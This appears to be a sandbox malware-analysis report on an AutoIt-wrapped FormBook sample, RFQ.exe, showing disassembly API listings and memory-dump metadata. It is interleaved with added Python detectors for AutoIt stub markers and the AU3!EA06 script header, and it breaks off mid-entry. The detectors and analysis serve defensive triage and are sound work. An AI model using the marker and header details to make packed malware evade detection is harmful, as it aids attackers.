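"""Static triage for compiled-AutoIt runtime stubs.

Added example; not code from Joe Sandbox, AutoIt or the analysed sample.
Scans a raw PE image for the stub markers listed in the report. Strings the
report shows going to ...A APIs are matched as ASCII, strings going to ...W
APIs or __wcsicoll as UTF-16LE. Marker weights and the threshold are
assumptions chosen for this example, not values from the report.
"""
from __future__ import annotations

import sys
from dataclasses import dataclass


@dataclass(frozen=True)
class Marker:
    name: str
    text: str
    wide: bool   # True: UTF-16LE (passed to a ...W API); False: ASCII (...A API)
    weight: int  # assumed scoring weight, not from the report


AV_RESEARCHER_MSG = (
    "This is a compiled AutoIt script. AV researchers please email "
    "avsupport@autoitscript.com for support."
)

MARKERS: tuple[Marker, ...] = (
    # MessageBoxA(0, msg, caption, MB_ICONHAND) at 0042E1C9: narrow string.
    Marker("av_researcher_msg", AV_RESEARCHER_MSG, wide=False, weight=5),
    # Switches compared with __wcsicoll in the 00401F20 routine: wide strings.
    Marker("cmdline_execute_script", "/AutoIt3ExecuteScript", wide=True, weight=3),
    Marker("cmdline_execute_line", "/AutoIt3ExecuteLine", wide=True, weight=3),
    Marker("cmdline_output_debug", "/AutoIt3OutputDebug", wide=True, weight=2),
    # RegOpenKeyExW(0x80000001 = HKEY_CURRENT_USER, "Software\AutoIt v3\AutoIt", ...) at 0040E4DD.
    Marker("registry_autoit_key", "Software\\AutoIt v3\\AutoIt", wide=True, weight=3),
    # "runas" verb passed to ShellExecuteW at 0042E2B9; common in benign installers, so low weight.
    Marker("runas_verb", "runas", wide=True, weight=1),
)

# Assumed threshold: the AV message alone (5) or message plus "runas" (6) is not
# enough; the message plus one stub-specific switch or the registry key is.
THRESHOLD = 7


def _needle(marker: Marker) -> bytes:
    return marker.text.encode("utf-16-le" if marker.wide else "ascii")


def find_markers(data: bytes) -> dict[str, list[int]]:
    """Return {marker name: [byte offsets]} for every marker present in data."""
    hits: dict[str, list[int]] = {}
    for marker in MARKERS:
        needle = _needle(marker)
        offsets: list[int] = []
        pos = data.find(needle)
        while pos != -1:
            offsets.append(pos)
            pos = data.find(needle, pos + 1)
        if offsets:
            hits[marker.name] = offsets
    return hits


def score(hits: dict[str, list[int]]) -> int:
    """Each marker counts once, however many times it occurs."""
    return sum(m.weight for m in MARKERS if m.name in hits)


def verdict(data: bytes, threshold: int = THRESHOLD) -> tuple[str, int, dict[str, list[int]]]:
    """Classify an image by the weighted markers it contains."""
    hits = find_markers(data)
    total = score(hits)
    if total >= threshold:
        label = "compiled-autoit-stub"
    elif total > 0:
        label = "weak-indicators"
    else:
        label = "no-autoit-markers"
    return label, total, hits


def build_constructed_sample() -> bytes:
    """Constructed stand-in for a stub image (not RFQ.exe): a fake DOS header
    followed by a few markers in the encodings the listed APIs expect."""
    return b"".join([
        b"MZ" + b"\x90" * 62,                          # 64 bytes of fake DOS header
        b"\x00" * 16,                                  # padding; message lands at offset 80
        AV_RESEARCHER_MSG.encode("ascii") + b"\x00",
        "/AutoIt3ExecuteScript".encode("utf-16-le") + b"\x00\x00",
        "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00",
        "runas".encode("utf-16-le") + b"\x00\x00",
        b"\x00" * 32,
    ])


def main(argv: list[str]) -> int:
    data = open(argv[1], "rb").read() if len(argv) > 1 else build_constructed_sample()
    label, total, hits = verdict(data)
    print(f"verdict={label} score={total}")
    for name, offsets in hits.items():
        print(f"  {name}: offsets {[hex(o) for o in offsets]}")
    return 1 if label == "compiled-autoit-stub" else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with a file path to scan a dumped image, or with no argument to scan the constructed sample. A hit only says "this is the AutoIt interpreter stub"; the embedded script and the FormBook payload it decrypts are not touched by this check, so the process-injection signatures from the report remain the evidence for the actual payload.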

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • _fseek.LIBCMT ref: 0045292B
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                          • __fread_nolock.LIBCMT ref: 00452961
                                                                          • __fread_nolock.LIBCMT ref: 00452971
                                                                          • __fread_nolock.LIBCMT ref: 0045298A
                                                                          • __fread_nolock.LIBCMT ref: 004529A5
                                                                          • _fseek.LIBCMT ref: 004529BF
                                                                          • _malloc.LIBCMT ref: 004529CA
                                                                          • _malloc.LIBCMT ref: 004529D6
                                                                          • __fread_nolock.LIBCMT ref: 004529E7
                                                                          • _free.LIBCMT ref: 00452A17
                                                                          • _free.LIBCMT ref: 00452A20
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1255752989-0
                                                                          • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                          • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
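The dotted fields of the .sdmp names listed under Memory Dump Source encode where each dump came from. The following parser is an added example, not Joe Sandbox code; it assumes (from the values on this page, not from any documented format) that the fourth field is the region base address, the fifth the Windows PAGE_* protection value and the seventh the MEM_* region type, and it leaves the sixth and eighth fields undecoded. The sample names are the seven dumps from this report.

```python
"""Decode Joe Sandbox .sdmp dump names and flag the executable regions.

Added example. Field meanings are assumptions inferred from this report:
  <process>.<phase>.<serial>.<base16>.<protect8>.<field6>.<memtype8>.<field8>.sdmp
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Windows page-protection constants from winnt.h (low byte of the value).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# MEMORY_BASIC_INFORMATION.Type constants from winnt.h.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpName:
    process: str
    phase: str
    serial: str
    base: int
    protect: int
    field6: str       # meaning not established; kept verbatim
    mem_type: int
    field8: str       # meaning not established; kept verbatim


def parse_sdmp_name(name: str) -> DumpName:
    """Split one .sdmp file name into its fields (assumed layout, see module doc)."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an sdmp name: {name!r}")
    proc, phase, serial, base, prot, f6, mtype, f8 = m.groups()
    return DumpName(proc, phase, serial, int(base, 16), int(prot, 16), f6, int(mtype, 16), f8)


def is_executable(d: DumpName) -> bool:
    """True when the protection value carries any PAGE_EXECUTE* bit (0x10..0x80)."""
    return bool(d.protect & 0xF0)


def describe(d: DumpName) -> str:
    prot = PAGE_PROTECT.get(d.protect & 0xFF, f"0x{d.protect:x}")
    mtype = MEM_TYPE.get(d.mem_type, f"0x{d.mem_type:x}")
    return f"{d.base:#010x} {prot} {mtype}"


def executable_bases(names: list[str]) -> list[int]:
    """Base addresses of the dumps that were mapped executable."""
    return [d.base for d in map(parse_sdmp_name, names) if is_executable(d)]


# The seven dump names from this report.
SAMPLE_NAMES = [
    "00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        d = parse_sdmp_name(n)
        print(describe(d), "EXEC" if is_executable(d) else "")
```

Run over the names above, only the 0x00401000 region (the PE's code section, protection 0x20 = PAGE_EXECUTE_READ, type MEM_IMAGE) comes back as executable; the header at 0x00400000 and the data regions are read-only, read-write or write-copy. That is the first thing to check when deciding which dump to load into a disassembler.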

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                                          • String ID: FILE
                                                                          • API String ID: 3888824918-3121273764
                                                                          • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                          • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                          • ImageList_ReplaceIcon.COMCTL32(00ADF330,000000FF,00000000), ref: 00410552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                          • RegisterClassExW.USER32(?), ref: 0041045D
                                                                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00ADF330,000000FF,00000000), ref: 00410552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc
                                                                          • String ID: Default
                                                                          • API String ID: 1579825452-753088835
                                                                          • Opcode ID: 8d6a693bc28ede282e6a55fdab6cf0c37e3d7becfc9ec4ad637a350fdd6cb948
                                                                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                          • Opcode Fuzzy Hash: 8d6a693bc28ede282e6a55fdab6cf0c37e3d7becfc9ec4ad637a350fdd6cb948
                                                                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                          Control-flow Graph

                                                                           • Graphic not reproduced (legend: executed / not executed blocks)
                                                                           • Function entry 0040F5C0; basic blocks span 0040F5C0-0040F6DF and 00425D05-00425D5F
                                                                           • Subcalls: 00422240, 00413650, 00410E60, 00414D04, 004150D1, 00414D30
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_fseek_memmove_strcat
                                                                          • String ID: AU3!$EA06
                                                                          • API String ID: 1268643489-2658333250
                                                                          • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                          • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
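The function above (entry 0040F5C0) seeks and reads through the file and references the strings "AU3!" and "EA06"; together these form "AU3!EA06", the marker that the AutoIt3 runtime searches for to locate its embedded compiled script, consistent with the "AutoIt v3 GUI" window class registered by the functions at 00410490 and 004103xx. The scanner below is an added example, not code from Joe Sandbox or AutoIt. It assumes the 16-byte header value that public AutoIt script extractors report immediately before the marker; treat that constant as an assumption to verify against a known sample. The input buffer is constructed, not taken from RFQ.exe.

```python
"""Find the AU3!EA06 compiled-AutoIt script marker in a file image.

Added example. The 16-byte header preceding the marker is an assumption
(value as reported by public AutoIt script extractors); verify locally.
"""
from __future__ import annotations

from dataclasses import dataclass

AU3_MARKER = b"AU3!EA06"
AU3_HEADER_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")  # assumed


@dataclass(frozen=True)
class Au3Hit:
    offset: int       # offset of "AU3!EA06" inside the buffer
    has_magic: bool   # True when the assumed 16-byte header sits right before it


def find_au3_markers(data: bytes) -> list[Au3Hit]:
    """Every occurrence of the marker, with a flag for the expected header in front."""
    hits: list[Au3Hit] = []
    pos = data.find(AU3_MARKER)
    while pos != -1:
        preceded = pos >= len(AU3_HEADER_MAGIC) and \
            data[pos - len(AU3_HEADER_MAGIC):pos] == AU3_HEADER_MAGIC
        hits.append(Au3Hit(pos, preceded))
        pos = data.find(AU3_MARKER, pos + 1)
    return hits


def looks_like_autoit_wrapper(data: bytes) -> bool:
    """MZ image carrying at least one marker that has the header in front of it.

    A bare "AU3!EA06" string can occur in the AutoIt runtime's own code (this
    report's function at 0040F5C0 references it), so a marker without the
    header is reported by find_au3_markers but not counted here.
    """
    return data[:2] == b"MZ" and any(h.has_magic for h in find_au3_markers(data))


def scan_file(path: str) -> list[Au3Hit]:
    with open(path, "rb") as fh:
        return find_au3_markers(fh.read())


# Constructed sample: MZ stub, padding, header+marker (a real script blob would
# follow), then a stray marker with no header, as the runtime's code might contain.
SAMPLE = (b"MZ" + b"\x00" * 510
          + AU3_HEADER_MAGIC + AU3_MARKER + b"\x00" * 64
          + b"xxAU3!EA06yy")

if __name__ == "__main__":
    for h in find_au3_markers(SAMPLE):
        print(f"AU3!EA06 at 0x{h.offset:x} header_ok={h.has_magic}")
    print("autoit wrapper:", looks_like_autoit_wrapper(SAMPLE))
```

On a real sample, run scan_file against the PE on disk and against the 0x00401000 dump listed under Memory Dump Source: the marker with the header in front is the place to start carving the script, while a header-less hit inside the code section is just the loader's own search string.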

                                                                          Control-flow Graph

                                                                           • Graphic not reproduced (legend: executed / not executed blocks)
                                                                           • Function entry 00401100; basic blocks span 00401100-00401225 and 0042AFB4-0042B06D
                                                                           • Subcalls: 00401250, 00401000, 0040E0C0, 0040F190, 00468B0E, 00401A50, 004370F4, 0045FD57
                                                                           • API calls inside the graph: DefWindowProcW, KillTimer, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                          • CreatePopupMenu.USER32 ref: 00401204
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303
                                                                          • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                          • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                          Control-flow Graph

                                                                           • Graphic not reproduced (legend: executed / not executed blocks)
                                                                           • Function entry 004115D7; basic blocks span 004115D7-00411656
                                                                           • Subcalls: 004135BB, 00411988, 00417FC0, 0041130A, 004180AF, 00418105
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • std::exception::exception.LIBCMT ref: 00411626
                                                                          • std::exception::exception.LIBCMT ref: 00411640
                                                                          • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                          • String ID: ,*H$4*H$@fI
                                                                          • API String ID: 615853336-1459471987
                                                                          • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                          • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                          Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost)
                                                                          • Function 4032678: block 4032678-4032726 call 4030048; 403272d-4032753 call 4033588, CreateFileW; 4032771-403278b VirtualAlloc; 4032792-40327a9 ReadFile; 40327b0-40327f0 VirtualAlloc; 40327f7-4032812 and 4032829-4032858 call 40337d8; 403285a-403286e call 40335e8; 4032878-403287c CloseHandle; 4032888-4032893 VirtualFree; 4032896-403289f loops back to 403272d; 4032964-403296f VirtualFree.
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04032749
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0403296F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                          • Instruction ID: d5bd68f7ebf449815d101f1f835b63391d38fa37d4f6768f314fad8b63f93939
